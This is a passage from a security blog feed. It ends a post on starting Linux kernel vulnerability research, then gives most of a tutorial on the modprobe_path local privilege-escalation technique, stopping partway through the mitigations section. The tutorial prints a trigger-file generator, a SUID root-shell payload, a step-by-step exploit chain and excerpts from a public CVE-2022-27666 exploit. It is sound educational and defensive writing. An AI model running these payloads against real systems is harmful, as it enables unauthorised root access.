scoffed. Surely not? But lo and behold, several years later I can confirm Twitter is still probably the best means to find this kind of content. It is what it is.</p><p>Alternatively of course, you can try to curate your own feed (e.g. 
via RSS or Atom) from the sources themselves and use a reader to catch updates.</p><p>Another source beyond blogs and news sites is of course mailing lists. Yep, they&apos;re still a thing. The one I mainly keep an eye on is <a href="https://www.openwall.com/lists/oss-security/2022/08/">oss-security</a>, which is where you&apos;ll find public disclosures for linux kernel stuff if they went through the CVD process. </p><p>Furthermore, if you want to get granular and you&apos;re looking for specific information, don&apos;t be afraid to dive into commit history or the lkml. </p><h3 id="having-a-gameplan">Having a Gameplan</h3><p>We&apos;re almost there, I promise! The last, but certainly not the least, aspect of the workflow I want to talk about is having a gameplan for approaching vred projects.</p><p>Whether it&apos;s vulnerability research or exploit development, we&apos;re dealing with inherently complex and open-ended problems, which may have no solution at all.</p><p>By approaching these problems with a structured methodology, we&apos;re able to break down what can seem like a daunting and overwhelming task into manageable chunks. Also, if we get to the end of it and don&apos;t find that bug or pop that shell, we at least know we&apos;ve tried our best and can take what we&apos;ve learned and move onto the next task.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/gameplan.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>So instead of just diving into the problem and following each lead, I&apos;d recommend figuring out a gameplan that works for you and trying to approach these problems in an ordered, methodical way. </p><p>Again, this is something that will vary from person to person, depending on how you work. 
It will also likely evolve over time as you do more of this kind of work, and that&apos;s okay :) </p><p>For more concrete examples, I talk about this in my talk &quot;E&#x2019;rybody Gettin&#x2019; TIPC: Demystifying Remote Linux Kernel Exploitation&quot;. The recording isn&apos;t up yet, but you can see the slides <a href="https://conference.hitb.org/hitbsecconf2022sin/materials/D1T1%20-%20Erybody%20Gettin%20TIPC%20-%20Demystifying%20Remote%20Linux%20Kernel%20Exploitation%20-%20Sam%20Page.pdf">here</a>.</p><hr><ol><li><a href="https://sam4k.com/setting-up-a-virtualised-linux-empire-on-apple-silicon/">Setting Up A Virtualised (Linux) Empire on Apple Silicon</a></li><li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">Patching, Instrumenting &amp; Debugging Linux Kernel Modules</a></li></ol><h2 id="resources">Resources</h2><p>I&apos;m already 3000 words deep so this resources section will be a work in progress and is far from exhaustive. If you have additions, feel free to @ me or DM me and I&apos;ll get them in.</p><h4 id="ctfs">CTFs</h4><ul><li><a href="https://ctf.hackthebox.com">HTB</a> has some kernel pwn challenges to practice your skills with </li><li><a href="https://github.com/smallkirby" rel="author">smallkirby</a>/<a href="https://github.com/smallkirby/kernelpwn">kernelpwn</a> seems like a decent curation of some kernel pwn challenges, with a section for beginners too :) </li></ul><h4 id="reading-materials">Reading Materials</h4><ul><li>No need to reinvent the wheel, absolutely check out the awesome repo <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a>, maintained by<a href="https://twitter.com/andreyknvl"> @andreyknvl</a>, containing a wealth of papers and write-ups</li><li><a href="https://0xax.gitbooks.io/linux-insides/content/">linux-insides</a> by <a href="https://twitter.com/0xAX">0xAX</a> is a great low-level dive into some linux internals and was an inspiration for my own 
<a href="https://sam4k.com/linternals-introduction/">linternals</a> series :) </li><li><a href="https://lwn.net">LWN.net</a> </li><li><a href="https://github.com/sam4k" rel="author">sam4k</a>/<a href="https://github.com/sam4k/linux-kernel-resources">linux-kernel-resources</a> is my attempt to curate some useful kernel tidbits related to compiling, debugging, instrumenting and patching the linux kernel </li></ul><h4 id="tools">Tools</h4><ul><li><a href="https://elixir.bootlin.com/linux/latest/source">bootlin&apos;s elixir cross referencer for linux source</a>; great for browsing different kernel versions with references &amp; defs in the browser</li><li><a href="https://github.com/doomemacs/doomemacs">Doom Emacs</a>, my current IDE setup</li><li><a href="https://github.com/hugsy" rel="author">hugsy</a>/<a href="https://github.com/hugsy/gef">gef</a> (GDB Enhanced Features), an addon for GDB to improve RE/xdev workflow</li></ul><h4 id="video-materials">Video Materials</h4><ul><li><a href="https://www.youtube.com/c/BlackHatOfficialYT">Black Hat</a> (YouTube)</li><li><a href="https://www.youtube.com/user/DEFCONConference">DEFCONConference</a> (YouTube)</li><li><a href="https://www.youtube.com/user/hitbsecconf">Hack In The Box Security Conference</a> (YouTube)</li><li><a href="https://www.youtube.com/c/OffensiveCon">OffensiveCon</a> (YouTube)</li></ul><h2 id="wrapping-up">Wrapping Up</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/itsdone.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>Oof, that was a long one, huh? Unlike my other posts, this one has covered a particularly subjective topic. 
Typically the content of my posts is derived from some objective source like the Linux kernel, however this one has ultimately been the culmination of my own experiences, understanding and journey into linux vred.</p><p>That said, I hope that at least some of the insights I&apos;ve shared today have been useful for you. Not everything I&apos;ve talked about will apply to everyone, but fingers crossed there&apos;s some helpful nuggets of information in there for each of you.</p><p>As always, I love to talk about this stuff and it means a lot to be able to help inspire and motivate people on their linux-y vred-y journeys. If you have any questions, suggestions or corrections then feel free to <a href="https://twitter.com/sam4k1">@ me or DM me on Twitter</a> :) </p><h4 id="change-history">Change History</h4><p><em>I have a feeling this will see some updates and additions, so stay tuned here for any updates to the post. </em></p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Kernel Exploitation Techniques: modprobe_path]]></title><description><![CDATA[Let's kick things off with a modern day staple for local privilege escalation (LPE) in Linux Kernel Exploitation, modprobe_path. ]]></description><link>https://sam4k.com/like-techniques-modprobe_path/</link><guid isPermaLink="false">6266f59c1b5b6d052837bff4</guid><category><![CDATA[linux]]></category><category><![CDATA[VRED]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Mon, 04 Jul 2022 14:54:17 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer-1.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/tired_computer-1.gif" alt="Kernel Exploitation Techniques: modprobe_path"><p>I thought we&apos;d kick things off with a modern day staple for local privilege escalation (LPE) in <strong>Li</strong>nux <strong>K</strong>ernel <strong>E</strong>xploitation, <code>modprobe_path</code>. 
</p><p>The aim of this series on exploitation techniques is to provide byte-sized (lol, sorry) analyses of specific techniques and primitives used in kernel exploitation.</p><p>We&apos;ll focus on explaining why and when these techniques are used and how they work, before finally touching on existing, upcoming or speculative mitigations.</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#diving-in">Diving In</a>
<ul>
<li><a href="#the-code">The Code</a></li>
<li><a href="#a-pseudo-case-study">A Pseudo Case-Study</a>
<ul>
<li><a href="#actual-examples">Actual Examples</a>
<ul>
<li>CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#so-were-all-good">So We&apos;re All Good?</a></li>
<li><a href="#alternatives">Alternatives</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="overview">Overview</h2><p><code><a href="https://linux.die.net/man/8/modprobe">modprobe</a></code> is a userspace program for adding and removing modules from the Linux kernel. When the kernel needs a feature that currently isn&apos;t loaded into the kernel, it can use <code>modprobe</code> to load in the appropriate module.</p><p>One example of this is when a userspace process <code><a href="https://man7.org/linux/man-pages/man2/execve.2.html">execve()</a></code>&apos;s a binary:</p><ol><li>the kernel will look for the appropriate binary loader</li><li>if the binary&apos;s header isn&apos;t recognised, it will attempt to load the appropriate module, specifically <code>binfmt-CCDD</code>, where <code>CCDD</code> is the hex representation of bytes 2 and 3 of the binary (we&apos;ll see exactly how this name is built later)</li><li>the kernel will attempt to load the module via <code>modprobe</code>, running it as root via the absolute path stored in the titular exported kernel symbol <code>modprobe_path</code></li></ol><p>With an arbitrary address write (AAW) primitive and the address of the <code>modprobe_path</code> symbol, an attacker can overwrite <code>modprobe_path</code> with the path to a malicious binary X.</p><p>Then, by creating and executing a binary with an unknown header<sup>[1]</sup>, an unprivileged attacker can cause the kernel to go through steps 1-3 above. </p><p>Except this time, it runs the overwritten <code>modprobe_path</code> as root, letting the attacker run malicious binary X as root, allowing for LPE. 
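</p><p>To make this concrete, here&apos;s a hedged little userspace sketch (my own illustration, not taken from any particular exploit; the path and the <code>make_trigger()</code> helper name are arbitrary) of creating such an unrecognised-header binary:</p>

```c
/* Sketch: write a 4-byte, non-printable header to a file and mark it
 * executable. execve()'ing the result fails with ENOEXEC in userspace,
 * but kernel-side the unrecognised header has already kicked off the
 * modprobe_path usermode helper. Path/helper name are illustrative. */
#include <stdio.h>
#include <sys/stat.h>

int make_trigger(const char *path)
{
    /* 0xff fails the kernel's printable() check, so the all-printable
     * early-out in search_binary_handler() is not taken */
    const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
    FILE *f = fopen(path, "wb");

    if (!f)
        return -1;
    if (fwrite(magic, 1, sizeof(magic), f) != sizeof(magic)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return chmod(path, 0755); /* must be executable for execve() */
}
```

<p>After <code>make_trigger(&quot;/tmp/trigger&quot;)</code>, simply running the file (via <code>execve()</code> or your shell) is enough to make the kernel exec whatever <code>modprobe_path</code> points at, as root.</p><p>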
</p><hr><ol><li>Specifically, as we&apos;ll explain later, at least one of the first 4 bytes needs to be non-<code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/fs/exec.c#L1698">printable()</a></code>, and the header can&apos;t match an already supported format </li></ol><h2 id="diving-in">Diving In</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/going_on_an_adventure.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="480" height="196"></figure><p>Now that we&apos;ve got a high level overview of what we&apos;re dealing with, let&apos;s dive into some technical details as we explore the code path to executing <code>modprobe_path</code>, use cases for this technique and how it can be leveraged by attackers. Finally we&apos;ll cover mitigations.</p><h3 id="the-code">The Code</h3><p>When we call the <code>execve()</code> family in userspace, directly or indirectly (such as running a program in your shell), it ultimately makes its way to the kernel via the <code><a href="https://man7.org/linux/man-pages/man2/execve.2.html">execve</a></code> syscall:</p><figure class="kg-card kg-code-card"><pre><code>SYSCALL_DEFINE3(execve,
		const char __user *, filename,
		const char __user *const __user *, argv,
		const char __user *const __user *, envp)
{
	return do_execve(getname(filename), argv, envp);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c">fs/exec.c</a> (v5.18.5)</figcaption></figure><p>We&apos;ll not get too bogged down in how programs actually get run in Linux, as there&apos;s plenty of great content out there on the topic<sup>[1]</sup>. </p><p>What we&apos;re interested in is the fact that in order to execute the program specified by <code>filename</code>, the kernel needs to understand what it&apos;s trying to execute. </p><p>As mentioned earlier, part of this process involves <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702">search_binary_handler(struct linux_binprm *bprm)</a></code>, where <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18">struct linux_binprm</a></code> is the binary parameter struct, which is used by the kernel to &quot;hold the arguments that are used when loading binaries&quot;<sup>[2]</sup>.</p><figure class="kg-card kg-code-card"><pre><code>[#0] search_binary_handler(...)
[#1] exec_binprm(...)
[#2] bprm_execve(...)
[#3] do_execveat_common(...)
[#4] do_execve(...)
[#5] SYSCALL_DEFINE3(execve,...) 
[#6] userspace makes execve() syscall</code></pre><figcaption>Pseudo-backtrace up to <code>search_binary_handler()</code></figcaption></figure><p>As per the source comments, this function &quot;<em>cycle[s] the list of binary formats handler, until one recognizes the image&quot;. </em>These binary format handlers are represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L85">struct linux_binfmt</a></code> and are stored in the doubly linked list, <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L82">formats</a></code>.</p><figure class="kg-card kg-code-card"><pre><code>static int search_binary_handler(struct linux_binprm *bprm)
{
	bool need_retry = IS_ENABLED(CONFIG_MODULES);
	struct linux_binfmt *fmt;
	int retval;
    
	...
 retry:
	read_lock(&amp;binfmt_lock);
	list_for_each_entry(fmt, &amp;formats, lh) {
		if (!try_module_get(fmt-&gt;module))
			continue;
		read_unlock(&amp;binfmt_lock);

		retval = fmt-&gt;load_binary(bprm);

		read_lock(&amp;binfmt_lock);
		put_binfmt(fmt);
		if (bprm-&gt;point_of_no_return || (retval != -ENOEXEC)) {
			read_unlock(&amp;binfmt_lock);
			return retval;
		}
	}
	read_unlock(&amp;binfmt_lock);

	if (need_retry) {
		if (printable(bprm-&gt;buf[0]) &amp;&amp; printable(bprm-&gt;buf[1]) &amp;&amp;
		    printable(bprm-&gt;buf[2]) &amp;&amp; printable(bprm-&gt;buf[3]))
			return retval;
		if (request_module(&quot;binfmt-%04x&quot;, *(ushort *)(bprm-&gt;buf + 2)) &lt; 0)
			return retval;
		need_retry = false;
		goto retry;
	}

	return retval;
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702">fs/exec.c </a>(v5.18.5)</figcaption></figure><p>Looking at the code above, we can see that <code>search_binary_handler()</code> iterates over each binary format in <code>formats</code> [line 10]. As we iterate over each format, we see if that format&apos;s <code>load_binary()</code><sup>[3]</sup> implementation can process our <code>bprm</code> (which contains a buffer, <code>buf</code>, of up to the first <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/uapi/linux/binfmts.h#L19">BINPRM_BUF_SIZE</a></code> bytes of data from our executable) [line 15].</p><p>If we managed to load the binary, we can return successfully [line 21], otherwise if we&apos;ve tried all the formats in <code>formats</code> and <code>CONFIG_MODULES</code> <sup>[4]</sup> is set, we hit the block starting line 27.</p><p>Then comes the check [line 27] we mentioned earlier: if each of the first 4 bytes of our executable are all <code>printable()</code>, we return here.</p><figure class="kg-card kg-code-card"><pre><code class="language-C">#define printable(c) (((c)==&apos;\t&apos;) || ((c)==&apos;\n&apos;) || (0x20&lt;=(c) &amp;&amp; (c)&lt;=0x7e))</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1698">fs/exec.c </a>(v5.18.5)</figcaption></figure><p><code>printable()</code> is a simple macro that yields true if char <code>c</code> is an ASCII printable character (a tab, newline, space or other ASCII characters you see on your keyboard).</p><p>So, if the first four bytes of the binary contain one or more non-<code>printable()</code> bytes<sup>[5]</sup> then comes the interesting part [line 30]: the kernel will attempt to find the appropriate binary format handler by trying to load a module of the expected name &quot;binfmt-WXYZ&quot;, where WXYZ is the hex representation of the 16-bit value at bytes 2 and 3 of our executable (note the <code>%04x</code> format string and <code>bprm-&gt;buf + 2</code> on line 30: despite all four bytes being checked for printability, only two of them end up in the module name). 
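</p><p>As a quick sanity check of the above, here&apos;s a small userspace re-implementation (my own sketch for illustration, not kernel code; the <code>binfmt_module_name()</code> helper is made up) of the <code>printable()</code> check and the module name construction. Because of the <code>%04x</code> format string and the <code>bprm-&gt;buf + 2</code> offset, only bytes 2 and 3 of the header actually make it into the module name, even though all four bytes are checked for printability:</p>

```c
/* Userspace mirror of the fs/exec.c logic: decide whether a 4-byte
 * header would trigger a modprobe attempt, and if so build the
 * "binfmt-%04x" module name the kernel would request. */
#include <stdio.h>
#include <string.h>

#define printable(c) (((c) == '\t') || ((c) == '\n') || (0x20 <= (c) && (c) <= 0x7e))

/* Returns 1 and fills name[] if this header would reach request_module() */
int binfmt_module_name(const unsigned char *buf, char *name, size_t len)
{
    if (printable(buf[0]) && printable(buf[1]) &&
        printable(buf[2]) && printable(buf[3]))
        return 0; /* all printable: the kernel just returns -ENOEXEC */

    /* equivalent of *(ushort *)(bprm->buf + 2) on a little-endian machine */
    snprintf(name, len, "binfmt-%04x",
             (unsigned int)(buf[2] | ((unsigned int)buf[3] << 8)));
    return 1;
}
```

<p>Feeding it an all-<code>0xFF</code> header yields <code>binfmt-ffff</code>, i.e. the module name we&apos;d expect the kernel to hand to <code>request_module()</code>, while a printable header like <code>#!/b</code> never gets that far.</p><p>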
</p><p>For reference we can find the following modules in the kernel (where <code>-</code> and <code>_</code> are interchangeable in module names): <code>binfmt_elf</code>, <code>binfmt_script</code>, <code>binfmt_aout</code>. If we tried to <code>execve()</code> a binary whose first four bytes were <code>0xFFFFFFFF</code>, the kernel thread handling the <code>execve()</code> syscall would ultimately reach line 30 and try to <code>request_module(&quot;binfmt-ffff&quot;)</code>. </p><p>If we take a look at how <code>request_module()</code> is implemented, we can see that it is actually a macro for <code>__request_module()</code>: </p><figure class="kg-card kg-code-card"><pre><code class="language-C">int __request_module(bool wait, const char *name, ...);
#define request_module(mod...) __request_module(true, mod)</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/kmod.h#L24">include/linux/kmod.h</a> (v5.18.5)</figcaption></figure><p>By taking a look at <code>__request_module()</code> we can see that, after carrying out the necessary sanity and security checks, it ultimately calls <code>call_modprobe()</code> [line 29]:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">/**
 * __request_module - try to load a kernel module
 * @wait: wait (or not) for the operation to complete
 * @fmt: printf style format string for the name of the module
 * @...: arguments as specified in the format string
 ...
 * If module auto-loading support is disabled then this function
 * simply returns -ENOENT.
 */
int __request_module(bool wait, const char *fmt, ...)
{
	va_list args;
	char module_name[MODULE_NAME_LEN];
	int ret;

    ...
	if (!modprobe_path[0])
		return -ENOENT;

    ...
	if (ret &gt;= MODULE_NAME_LEN)
		return -ENAMETOOLONG;

	ret = security_kernel_module_request(module_name);
	if (ret)
		return ret;

    ...
	ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);
    ...
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/kmod.c#L124">kernel/kmod.c</a> (v5.18.5)</figcaption></figure><p>Finally (we&apos;re almost there, I promise!) we reach <code>call_modprobe()</code>. I&apos;ll avoid spamming you with more source, but for context, <code><a href="https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-setup.html">call_usermodehelper_setup()</a></code> [line 25] prepares the kernel to &quot;call a usermode helper&quot;, which for us right now essentially means running an executable in userspace as root. <code><a href="https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-exec.html">call_usermodehelper_exec()</a></code> [line 30] then does the job.</p><pre><code class="language-C">static int call_modprobe(char *module_name, int wait)
{
	struct subprocess_info *info;
	static char *envp[] = {
		&quot;HOME=/&quot;,
		&quot;TERM=linux&quot;,
		&quot;PATH=/sbin:/usr/sbin:/bin:/usr/bin&quot;,
		NULL
	};

	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	if (!argv)
		goto out;

	module_name = kstrdup(module_name, GFP_KERNEL);
	if (!module_name)
		goto free_argv;

	argv[0] = modprobe_path;
	argv[1] = &quot;-q&quot;;
	argv[2] = &quot;--&quot;;
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
	...
}</code></pre><p>On lines 19-23 you can see the argument vector we&apos;re using. So in our current context of a typical Linux system these days, trying to execute a binary beginning <code>0xFFFFFFFF</code>, as an unprivileged user we&apos;d ultimately be running the bash equivalent of:</p><pre><code class="language-sh">root# /usr/bin/modprobe -q -- binfmt-ffff   </code></pre><p>Where <code>/usr/bin/modprobe</code> is the value found in the kernel symbol <code>modprobe_path</code>. </p><p>What&apos;s important here is that the binary being executed in this root process is defined by the value of the kernel symbol <code>modprobe_path</code>.</p><h3 id="a-pseudo-case-study">A Pseudo Case-Study</h3><p>To recap what we&apos;ve covered so far:</p><ul><li>An unprivileged user can create a binary starting <code>0xFFFFFFFF</code> and try to <code>execve()</code> it, causing the kernel to create a root process running the equivalent of <code>$modprobe_path -q -- binfmt-ffff</code>, where <code>$modprobe_path</code> here is the value stored in the kernel symbol <code>modprobe_path</code></li><li>As a result, if an attacker can control <code>modprobe_path</code> then they can control the binary being executed by the root process</li></ul><p>Wait, so we need to overwrite a kernel symbol? If we can already do that haven&apos;t we already won?! Valid questions! The kernel is vast and complex, and as such so is kernel exploitation - there are many types of bugs and ways to achieve privilege escalation.</p><p>Similarly, the motivations and goals of attackers vary. 
As we&apos;re looking at LPEs, let&apos;s assume the goal here is to go from unprivileged user to having root access.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/image-5.png" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="551" height="171"></figure><p>Take this (very) simplistic view where we have a kernel memory corruption vulnerability, such as a heap buffer overflow. Ideally, we&apos;re able to leverage this to gain a control flow hijacking primitive (CFHP), where we can influence the flow of kernel code execution; say we manage to use our overflow to corrupt a pointer<sup>[6]</sup> and go from there.</p><p>If we can use our CFHP to overwrite arbitrary kernel addresses, we can use the <code>modprobe_path</code> technique we&apos;ve talked about to make the final pivot from kernel code execution to having root access in userspace (which is much more usable lol).</p><p>How, you ask? Well, first things first let&apos;s take a look at an example of a typical binary we can overwrite &amp; point <code>modprobe_path</code> to:</p><pre><code class="language-C">int main()
{
    system(&quot;cp /usr/bin/sh /tmp/sh&quot;);
    system(&quot;chown root:root /tmp/sh&quot;);
    system(&quot;chmod 4755 /tmp/sh&quot;);
}</code></pre><p>This payload copies <code>sh</code> to <code>/tmp/sh</code>, sets the owner of <code>/tmp/sh</code> to root, and then gives it the SUID bit. </p><p>This bit means that regardless of who runs the file, it runs with the owner&apos;s permissions. In this instance, if a user runs <code>/tmp/sh</code> after this, they will get a root shell<sup><a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">[7]</a></sup>.</p><p>So, to wrap our pseudo case-study up, our overall exploit chain might look like this:</p><ol><li>Create a binary (e.g. <code>/tmp/trigger</code>) to trigger the execution of <code>modprobe_path</code> as root via the kernel&apos;s usermodehelper, by starting it with bytes <code>0xFFFFFFFF</code> </li><li>Compile &amp; place the payload from the snippet above (e.g. <code>/tmp/pwn</code>)</li><li>Trigger our arbitrary address write (e.g. via some kernel mem corruption bug), using the AAW primitive to overwrite <code>modprobe_path</code> with our payload, <code>/tmp/pwn</code></li><li>Execute <code>/tmp/trigger</code>, which will cause the kernel to run <code>/tmp/pwn</code> (the new value of <code>modprobe_path</code>) as root </li><li>As an unprivileged user we can now get a root shell by running <code>/tmp/sh</code> which is now a SUID executable owned by root</li></ol><h4 id="actual-examples">Actual Examples</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/welcome_to_the_real_world.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="470" height="193"></figure><p>So we&apos;ve covered a hasty pseudo-case study of how an attacker might use this <code>modprobe_path</code> technique to escalate privileges via a kernel AAW. 
Below are a few recent real-world write-ups and examples of this technique put to use:</p><ol><li><a href="https://etenal.me/archives/1825">CVE-2022-27666: Exploit esp6 modules</a> in Linux kernel by <a href="https://twitter.com/ETenal7">@Etenal7</a></li><li><a href="https://www.willsroot.io/2022/01/cve-2022-0185.html">CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google&apos;s KCTF Containers</a> by <a href="https://twitter.com/cor_ctf">@cor_ctf</a></li><li><a href="https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/">Linux Kernel Exploitation Technique: Overwriting modprobe_path</a> by <a href="https://twitter.com/_lkmidas">@_lkmidas</a></li></ol><h5 id="cve-2022-27666-by-etenal7">CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></h5><p>I&apos;ve actually retroactively added this section after finishing the post, figuring it can&apos;t hurt to explore some real-world <a href="https://github.com/plummm/CVE-2022-27666">exploit code</a> making use of this technique. </p><p>So using what we&apos;ve learnt so far, particularly from our pseudo-case study, let&apos;s see how <a href="https://twitter.com/ETenal7">@Etenal7</a> makes use of this technique in their exploit (repo <a href="https://github.com/plummm/CVE-2022-27666">here</a>).</p><p>To read more on the memory corruption side of things and how they get an AAW primitive to be able to overwrite <code>modprobe_path</code>, check out the awesome <a href="https://etenal.me/archives/1825">write-up</a>. The tl;dr is they exploit an 8-page heap overflow (CVE-2022-27666), do some neat heap feng shui with the page allocator and the slab allocator, to ultimately gain a KASLR leak and AAW primitive.</p><p>Diving in, first of all we can see a similar payload in the file <code><a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c">get_rooot.c</a></code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

int main()
{
    system(&quot;chown root:root /tmp/myshell&quot;);       [0]
    system(&quot;chmod 4755 /tmp/myshell&quot;);            [1]
    system(&quot;/usr/bin/touch /tmp/exploited&quot;);      [2]
}</code></pre><figcaption><a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c">get_rooot.c</a></figcaption></figure><p>Besides creating a root-owned [0] SUID [1] shell, they also create a marker file <code>/tmp/exploited</code> to easily check later that the payload has been run [2]. </p><p>Moving on to the core exploit logic, over in <code><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></code>, we can see the setup of the invalid binary used to eventually trigger <code>modprobe_path</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">...
#define PROC_MODPROBE_TRIGGER &quot;/tmp/modprobe_trigger&quot;
...
void modprobe_trigger()
{
  execve(PROC_MODPROBE_TRIGGER, NULL, NULL);
}
...
void modprobe_init()
{
  int fd = open(PROC_MODPROBE_TRIGGER, O_RDWR | O_CREAT);      [0]
  if (fd &lt; 0)
  {
      perror(&quot;trigger creation failed&quot;);
      exit(-1);
  }
  char root[] = &quot;\xff\xff\xff\xff&quot;;                            
  write(fd, root, sizeof(root));                               [1]
  close(fd);
  chmod(PROC_MODPROBE_TRIGGER, 0777);                          [2]
}</code></pre><figcaption><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></figcaption></figure><p>We can see they programmatically create the <code>modprobe_path</code> trigger in <code>modprobe_init()</code>, creating an executable [2] at path <code>PROC_MODPROBE_TRIGGER</code> [0] which simply consists of an invalid 4-byte header, <code>&quot;\xff\xff\xff\xff&quot;</code> [1]. </p><p>This can later be triggered to make the kernel execute the, hopefully overwritten, <code>modprobe_path</code> via <code>modprobe_trigger()</code>.</p><p>Below I&apos;ve highlighted the code responsible for performing the AAW, triggering the corrupted <code>modprobe_path</code> and finally popping the payload:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">char *evil_str = &quot;/tmp/get_rooot\x00&quot;; [0] (from fuse_evil.c)
...
void overwrite_modprobe()
{
  void *modprobe_path = addr_modprobe_path + kaslr_offset; [1]
  ...

    ...
    arb_write(modprobe_path-8, strlen(evil_str), ...);     [2]
    ...
    sleep(1);
    modprobe_trigger();                                    [3]
    sleep(1);
    if (am_i_root()) {                                     [4]
      ...                                                  [5]
    }
    printf(&quot;[+] Not root, try again\n&quot;);
  }
  ...
}

int am_i_root()
{
  struct stat buffer;
  int exist = stat(&quot;/tmp/exploited&quot;, &amp;buffer);
  if(exist == 0)
      return 1;
  else  
      return 0;
}</code></pre><figcaption><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></figcaption></figure><p>First they use the leaked KASLR offset to work out the address of the <code>modprobe_path</code> kernel symbol [1]. Next, the AAW is triggered [2], overwriting the original value of <code>modprobe_path</code> with the path to the payload, <code>/tmp/get_rooot</code> [0].</p><p>Then, with <code>modprobe_path</code> hopefully overwritten, they call <code>modprobe_trigger()</code> [3] to execute the invalid binary so the kernel ultimately executes the new <code>modprobe_path</code>.</p><p>Finally <code>am_i_root()</code> is called to check for success by looking for the marker file <code>/tmp/exploited</code> that is created when the payload <code>/tmp/get_rooot</code> is run by <code>usermodehelper</code>. If it exists, we can pop a shell [5].</p><h3 id="mitigations">Mitigations</h3><p>Now we have an understanding of the technique, how it&apos;s used to facilitate LPE and some examples of real-world use cases ... how do we mitigate it?</p><p><code>CONFIG_STATIC_USERMODEHELPER</code> was introduced in 4.11<sup>[8]</sup>, back in 2017 by <a href="https://twitter.com/gregkh">Greg KH</a><sup>[9]</sup>, specifically to mitigate this kind of attack surface. </p><h4 id="one-helper-to-rule-them-all">One Helper to Rule Them All</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/gollum_scared.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="500" height="211"></figure><p>Looking at <code>call_modprobe()</code> earlier, the kernel specifies an executable path via <code>call_usermodehelper_setup(path, ...)</code> and then <code>call_usermodehelper_exec()</code> will execute the binary specified by <code>path</code>. 
Relevant to us is that <code>modprobe_path</code> is passed to <code>call_usermodehelper_setup()</code> and we can change <code>modprobe_path</code>.</p><p>With this config enabled, regardless of the <code>path</code> passed to <code>call_usermodehelper_setup()</code>, the kernel will only directly execute a single usermode binary defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code><sup>[10]</sup>. This path is read-only, so can&apos;t be changed (without write protection bit flipping shenanigans<sup>[11]</sup>). </p><figure class="kg-card kg-code-card"><pre><code class="language-C">struct subprocess_info *call_usermodehelper_setup(const char *path, ...)

{
	struct subprocess_info *sub_info;
	...
    
#ifdef CONFIG_STATIC_USERMODEHELPER
	sub_info-&gt;path = CONFIG_STATIC_USERMODEHELPER_PATH;
#else
	sub_info-&gt;path = path;
#endif

	...
